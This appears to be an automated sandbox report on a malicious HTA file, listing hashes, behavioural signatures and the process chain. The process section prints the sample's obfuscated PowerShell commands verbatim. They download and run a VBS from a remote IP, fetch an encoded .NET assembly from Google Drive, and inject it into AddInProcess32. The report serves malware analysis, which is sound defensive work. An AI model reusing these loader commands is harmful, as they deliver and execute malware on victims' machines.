Analysis
-
max time kernel
105s -
max time network
111s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system -
submitted
26-10-2024 02:31
Static task
static1
Behavioral task
behavioral1
Sample
b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948.hta
Resource
win10v2004-20241007-en
General
-
Target
b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948.hta
-
Size
130KB
-
MD5
401fa9878282b2404925d1ac2599b7c0
-
SHA1
876d5ea4b89ef48cd614fc098154e3e2caa176f3
-
SHA256
b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948
-
SHA512
45e2de1e196ae5339df31581bd8e98af094ab461f80269a815f369e51e131a885bb9745c60375aa4c95db75e82d58f799c5ae480ac2aa0b8387baa2aea2d0f63
-
SSDEEP
96:Eam73bDpMZMY9pMZMUyOX/DJfqMtJNpMZMVx7T:Ea23bDCuY9Cuitht/CuV9T
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow  pid   Process
3     2052  PoWErSHEll.EXE
6     2336  powershell.exe
8     2336  powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid   Process
2456  powershell.exe
2336  powershell.exe
Evasion via Device Credential Deployment 2 IoCs
pid   Process
2052  PoWErSHEll.EXE
2808  powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow  ioc
5     drive.google.com
6     drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc  Process
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  PoWErSHEll.EXE
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  csc.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cvtres.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Modifies Internet Explorer settings
description  ioc  Process
Key created  \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid   Process
2052  PoWErSHEll.EXE
2808  powershell.exe
2052  PoWErSHEll.EXE
2052  PoWErSHEll.EXE
2456  powershell.exe
2336  powershell.exe
Suspicious use of AdjustPrivilegeToken 4 IoCs
description              pid   Process
Token: SeDebugPrivilege  2052  PoWErSHEll.EXE
Token: SeDebugPrivilege  2808  powershell.exe
Token: SeDebugPrivilege  2456  powershell.exe
Token: SeDebugPrivilege  2336  powershell.exe
Suspicious use of WriteProcessMemory 28 IoCs
description                       pid   Process         procid_target
PID 1268 wrote to memory of 2052  1268  mshta.exe       29
PID 1268 wrote to memory of 2052  1268  mshta.exe       29
PID 1268 wrote to memory of 2052  1268  mshta.exe       29
PID 1268 wrote to memory of 2052  1268  mshta.exe       29
PID 2052 wrote to memory of 2808  2052  PoWErSHEll.EXE  31
PID 2052 wrote to memory of 2808  2052  PoWErSHEll.EXE  31
PID 2052 wrote to memory of 2808  2052  PoWErSHEll.EXE  31
PID 2052 wrote to memory of 2808  2052  PoWErSHEll.EXE  31
PID 2052 wrote to memory of 2868  2052  PoWErSHEll.EXE  32
PID 2052 wrote to memory of 2868  2052  PoWErSHEll.EXE  32
PID 2052 wrote to memory of 2868  2052  PoWErSHEll.EXE  32
PID 2052 wrote to memory of 2868  2052  PoWErSHEll.EXE  32
PID 2868 wrote to memory of 2856  2868  csc.exe         33
PID 2868 wrote to memory of 2856  2868  csc.exe         33
PID 2868 wrote to memory of 2856  2868  csc.exe         33
PID 2868 wrote to memory of 2856  2868  csc.exe         33
PID 2052 wrote to memory of 564   2052  PoWErSHEll.EXE  35
PID 2052 wrote to memory of 564   2052  PoWErSHEll.EXE  35
PID 2052 wrote to memory of 564   2052  PoWErSHEll.EXE  35
PID 2052 wrote to memory of 564   2052  PoWErSHEll.EXE  35
PID 564 wrote to memory of 2456   564   WScript.exe     36
PID 564 wrote to memory of 2456   564   WScript.exe     36
PID 564 wrote to memory of 2456   564   WScript.exe     36
PID 564 wrote to memory of 2456   564   WScript.exe     36
PID 2456 wrote to memory of 2336  2456  powershell.exe  38
PID 2456 wrote to memory of 2336  2456  powershell.exe  38
PID 2456 wrote to memory of 2336  2456  powershell.exe  38
PID 2456 wrote to memory of 2336  2456  powershell.exe  38
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\SysWOW64\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE"C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rq4dsw_v.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES844E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC844D.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2856
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl0
4OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336
Network
MITRE ATT&CK Enterprise v15
Downloads